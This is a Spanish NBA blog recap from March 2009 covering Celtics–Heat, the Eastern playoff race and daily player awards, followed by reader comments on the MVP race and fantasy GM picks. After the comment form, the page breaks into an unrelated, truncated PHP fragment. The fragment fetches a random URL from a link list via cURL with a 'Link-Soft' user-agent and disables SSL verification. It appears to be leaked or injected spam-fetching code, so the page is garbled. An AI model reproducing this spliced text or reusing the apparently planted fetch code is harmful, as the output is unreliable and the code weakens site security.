La Crónica (18/03/2009)

19 de March de 2009 por txusma

Como ya comentamos en la crónica de ayer, 2 eran los focos de atención de la noche del miércoles. Por un lado el duelo Magic – Celtic por la segunda plaza del Este y por el otro la dura y cerrada pelea por los Playoffs de la misma conferencia. Ninguna de las 2 batallas nos defraudó.

En los puestos altos de la clasificación los Celtics sin Garnett ni Ray Allen lograron imponerse en la prórroga a unos Heat en los que no jugó Dwyane Wade. Teniendo en cuenta que uno de los argumentos de los “Pro-MVP para Wade” es que sin él Miami es un equipo del montón, no deberían alegrarse mucho los verdes de haber ganado en la prórroga, en su casa y tras actuación estelar, estelarísima de Paul Pierce y Rajon Rondo. En todo caso una victoria que les deja aún por encima de los Magic, que se deshicieron sin ningún problema de los Bucks en un partido donde, tanto Turkoglu como Howard, se quedaron a 3 asistencias del triple-doble.

En el otro foco de la jornada, paso adelante de los Bulls que encadenan 3 victorias consecutivas y amarran ese octavo puesto. Tras su victoria frente a los Thunder el séptimo puesto de los Pistons (que perdieron de nuevo, esta vez contra los Rockets tras 2 prórrogas) está a tiro de piedra. Ganaron también los Nets frente a los Knicks en el duelo directo de la jornada y los Bobcats a los Kings. En cambio los Pacers ven desvanecerse las remotas opciones que tenían tras su derrota en casa contra Portland. Tras la jornada de hoy parece que los protagonistas de la  lucha por los últimos puestos de Playoffs serán definitivamente Chicago, Milwaukee, Charlotte y… Detroit. A falta de unos 15 partidos por jugar, los de Michigan tan solo aventajan en 3.5 victoria al noveno. Demasiada poca ventaja viendo como están las cosas.

Otro aspecto un tanto más secundario es el orden en que acabarán clasificados los equipos del Oeste lo que definirá unos enfrentamientos en primera ronda de Playoffs a todas luces apasionantes. Ayer, además de las victorias de Rockets y Blazers, victoria de los Hornets frente a los Wolves con gran actuación de Chris Paul (del que versará la pregunta del día) y de los Nuggets, con sudor, lágrimas. remontada y triple final de Carmelo (MCP – Most Clutch Player), frente a los Grizzlies.

En los partidos más o menos intrascendetes del día, victoria de los Suns con partidazos de Shaq, Nash, Richardson y Hill frente a Philadelphia y de los Clippers frente a los Wizards. Tremenda plantilla tienen los Clippers. Lástima de lesiones.

PREMIOS

MVP: Hoy ha sido un día de grandes actuaciones. Paul Pierce, 36 puntos, 11 rebotes y 5 asistencias; Yao Ming, 32 puntos y 15 rebotes; Carmelo Anthony, 35 puntos, 5 rebotes y triple decisivo; Dwight Howard, 28 puntos, 12 rebotes y 7 asistencias. Imposible decidirme sólo por uno.

Rookie: Hoy ha sido uno de esos días en que se demuestra que la del 2008 ha sido una de las mejores hornadas de los últimos años (tras la del 2003, posiblemente la mejor). Derrick Rose, 25 puntos y 6 rebotes; Michael Beasley, 21 puntos y 7 rebotes; Mario Chalmers, 19 puntos, 4 rebotes y 9 asistencias; Brook Lopez, 23 puntos, 5 rebotes y 8 asistencias; Kevin Love, 23 puntos y 11 rebotes.

Sorpresa: Ante la ausencia de Kevin Martin, Rashard McCants ha salido de titular y ha anotado nada y nada menos que 30 puntos. Eso sí, aparte de anotar poca cosa más: 1 solo rebote y una sola asistencia. ¡Y seguro que lo hizo sin querer! Mención para el pivot iraní Hamed Haddadi que ha disfrutado de 18 minutos en los que ha anotado 7 puntos, ha capturado 7 rebotes y ha puesto 2 tapones. ¿Deberái preocuparse Marc?

Decepción: Horribilísimo partido el que ha disputado hoy Spencer Hawes. El jugador de segundo año, que en el mes de marzo promediaba 17.3 puntos y 7 rebotes se ha ido a la cama con tan solo 2 puntos y 2 rebotes. Es lo que tienen los problemas de faltas.

El mayor esfuerzo en vano: Aparte de los habituales Danny Granger, Antawn Jamison y Kevin Durant, hoy aparece por aquí Rudy Gay que anotó 30 puntos que no sirvieron para nada. A lo mejor si se hubiera esmerado en otras facetas del juego (tan solo 2 rebotes y 1 asistencias. Como McCants, casi) Memphis hubiera conseguido la victoria.

Mención especial: Para los 20 rebotes de Antonio McDyess y las 20 asistencias de Baron Davis. Grandes números que merecen ser destacados.

LA PREGUNTA DEL DÍA

¿Exactamente cual es la razón por la cual se considera a Dwyane Wade en la carrera del MVP y se deja fuera a Chris Paul o Dwight Howard?

Comenta

16 comentarios a esta entrada

  1. couxe dice:
    #1

    Lo de Chris Paul lo comenté hace ya unas semanas, y la respuesta generalizada fué el balance de sus equipos… Y en cuanto a Howard, al menos en lo que yo lo he visto, me resulta un jugador menos decisivo que los otros 3, sobre todo en partidos importantes. Desde luego tiene muchos menos recursos ofensivamente hablando…

    A mi me gustaría haceros una pregunta…
    Si este verano os dejan como GM de una franquicia con tirón y podéis elegir a cualquier jugador para construir un equipo campeón a su alrededor… ¿A quién elegiríais…?

      Citar

  2. NONAME dice:
    #2

    por mi parte no quito de la carrera al mvp a Paul o a Howard pero es que Wade esta a otro nivel, pero a otro nivel muy superior. Ayer viendo el partido contra los celtics, viendo el tiempo extra y los tiros que se jugo Beasley y que cuando ya vio que se iban los celtics se empezaron a jugar los tiros los demas, no dejaba de pensar que si estuviera ahi Wade las hubiera enchufado y la sensacion de que por cada uno de los triples de celtics, la podria pillar y contestar con una jugada de esas que te dejan con la boca abierta.

    Por cierto cuando vi la lista de bajas de los celtics … puede que no esten en su mejor momento pero es que podrian hacer otro quinteto titular de un equipo de playoffs con los que tiene de baja. Si se recuperan bien y encima estan descansados siguen siendo favoritos

      Citar

  3. Jabho dice:
    #3

    A la pregunta de Txus, para mi el MVP es para Lebron y el resto está un paso por detrás. Por record del equipo, por como está jugando y si me apuras por lo mediático que es. Para mi creo que no debería haber dudas por ahora.

    La cosa es que el marzo de Wade ha sido descomunal. Pero de escándalo. Ya venía jugando bien, el se ha puesto a un nivel increible y además el equipo ha mejorado el balance y la clasificación… eso mantenido hasta el final era para dudar. Pero lo dicho, a pesar de las buenas temporadas de Kobe, Howard, Paul o Duncan creo que el MVP será para Lebron.

    Los Celtics bien. Los estuve viendo y como dice Noname es que tienen muchos problemas para hacer una rotación. Se llevaron un partido importante. A ver si el viernes recuperamos efectivos cara a la visita a SA. Pero con todos sanos Boston será un equipazo en Abril…

    Yo si fuera GM en un draft fantasia cogeráa a Lebron. Entiendo que hay muchos muy, muy buenos, pero yo me quedo con el Elegido.

      Citar

  4. MagicJohnson32 dice:
    #4

    Curioso: creo que fue hace menos de 48 horas que leía declaraciones de Wade en las que decía que esperaba jugar su primera temporada completa.

      Citar

  5. Miguel dice:
    #5

    Yo creo que es porque Wade tiene peores compañeros que Howard y CP3 y aún así esta ahí arriba con actuaciones memorables, aunque para mi el MVP es para Lebron con diferencia.
    Boston se salvo por poco ayer y me parece que acabaran terceros en el Este, los magic estan ahora mismo un escalón por encima y el camino para el segundo anillo lo veo muy complicado.
    A la pregunta de COUXE voy a ser un poco original i te diré que elegiría a Durant, con sus 20 años y con una plantilla competitiva harían cosas bonitas.

      Citar

  6. cinedine dice:
    #6

    Yo voto por lebron, tanto para el mvp como para formar un equipillo alrededor suyo. Solo hay que fijarse en lo que tiene alrededor en cleveland para ver el rendimiento que saca…

      Citar

  7. Viva_Dirk dice:
    #7

    Los motivos son distintos.

    Howard tiene a su equipo donde se les suponia o un escalón mas arriba, pero como han dicho arriba no es el quien saca las castañas del fuego en los momento difíciles, es mas si le hacen falta cuando recibe no es nada fiable. Para que Howard tenga un MVP tendrá que colocar a su equipo como el mejor de la liga y ser claramente el mas dominante, como hizo Shaq en su momento.

    Y a Paul le pasa que los Hornets no están al nivel que se les suponia, que era claramente el de top-3 del Oeste rondando las 60 victorias. Para mi como jugador esta al nivel de los mejores de la liga, y seguro que con sus números si los Hornets estuviesen peleando la primera plaza del Oeste o fuesen segundos con autoridad aparecería entre los candidatos.

    En cuanto a la pregunta de Couxe, depende, si es para ganar es mismo año yo seguramente apostaria por Kobe o Duncan, ya si es para montar un equipo de cara a la próxima década, haría casi seguro esta lista:

    1.- Chris Paul
    2.- Dwyane Wade
    3.- Lebron James
    4.- Al Jefferson
    5.- Kevin Durant
    6.- Brandon Roy
    7.- OJ Mayo
    8.- Dwight Howard
    9.- Deron Williams
    10.- Derrick Rose

    Seguramente hay nombres como Amare o Bosh también aparecerían en muchas quinielas, pero para mi son las grandes decepciones de este año.

      Citar

  8. Txusma dice:
    #8

    Si tenemos en cuenta los records de las franquicias, entonces pq aparece Wade en las quinielas? Tal vez pq no esperabamos que Miami estuviera donde esta? Le otorgamos todo el redito a Wade?

      Citar

  9. Vader dice:
    #9

    Para hombre franquicia Howard sin dudarlo.

    Saludos

      Citar

  10. UnderlocK dice:
    #10

    La pregunta creo que tiene poco sentido teniendo en cuenta que tanto Magic y Hornets tienen muchisimo mejor equipo que los Heat, por lo tanto Wade va con mucha desventaja en lo que a equipo se refiere. Y por esa misma razón es junto con LeBron los que mas merecen el MVP de la temporada, es de cajón en mi opinion.

    Yo veo casi todo los partidos de los Heat y ver a Wade es una delicia, juega como los ángeles y hace a sus compañeros mejores, como hace también LeBron. A parte esta haciendo su mejor temporada desde que llegó a la NBA y por su juego y números es el unico a día de hoy que puede disputarle el MVP a James.

    Y respecto a la pregunta de Couxe, yo me traia a mi equipo a Lebron o a Wade sin dudarlo, alrededor de estos dos jugones cualquier proyecto a corto o largo plazo tiene sinonimo de exito.

      Citar

  11. Miguel dice:
    #11

    A mi Bosh no me ha decepcionado, Toronto comenzó la temporada como uno de los favoritos que aspiraban a estar entre los mejores del Este. Pero creo que fue a partir del canastón de Carter:
    http://www.nba.com/video/games/raptors/2008/11/21/nba_njn_tor_0020800173_recap.nba/index.html
    Cuando todo comenzó a ir hacia abajo junto a la lesión de O’neal. Los numeros de Bosh en ese momento eran 26.9 PPP 10.8 RPP i 54% en porcentaje de tiros, creo que si todo hubiera funcionado como muchos esperabamos ahora Chris estaría entre las quinielas del MVP. Confio en los Raptors para el año que viene.

      Citar

  12. couxe dice:
    #12

    Respondiendo a mi propia pregunta, dentro del grupo de jugadores jóvenes que hay ahora mismo en la liga, yo me quedaría con Chris Paul… A mi me parece el jugador con más talento de la liga, y de los grandes gradísimos, de largo el que menos depende de su físico, además, es el que más hace jugar a su equipo y el más completo…

      Citar

  13. kantonyo dice:
    #13

    Hoy ha comenzado el March Madness, hasta ahora todos los favoritos han pasado la primera ronda sin grandes problemas.

    A destacar el gran partido de Greivis Vazquez, escolta de raza blanca de la Unversidad de Maryland, que posee una gran visión del juego, buena colocación, rapidez y un gran tiro de media-larga distancia. Nacido en Venezuela hace 22 años. Es uno de los tapados en la NCAA, pocos contaban con él, pero yo no lo descarto para ser un primera ronda en el próximo Draft. El próximo partido Maryland se enfrentará a uno de los favoritos, la Universidad de Memphis. Será una gran oportunidad para juzgar el potencial de Vasquez.

      Citar

  14. Txusma dice:
    #14

    Kantonyo… No te gustaria/importaria escribir un mini resumen diario de la March Madness? Creo que seria muy interesante y aqui siempre estamos abiertos a colaboraciones.

      Citar

  15. kantonyo dice:
    #15

    Ok, yo me estoy tragando bastantes partidos, asi que si quereis os informo de lo que va pasando en la “Locura” de Marzo. Lo hago desde los comentarios?? saludos

      Citar

  16. Txusma dice:
    #16

    Si quieres, puedes escribir tu los articulos y te los comentamos nosotros 😀
    En serio, si estas interesado te hago autor y mañana puedes escribir ya la primera colaboracion. Algun editor estara al loro y lo publicara.

    Muchisimas gracias!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>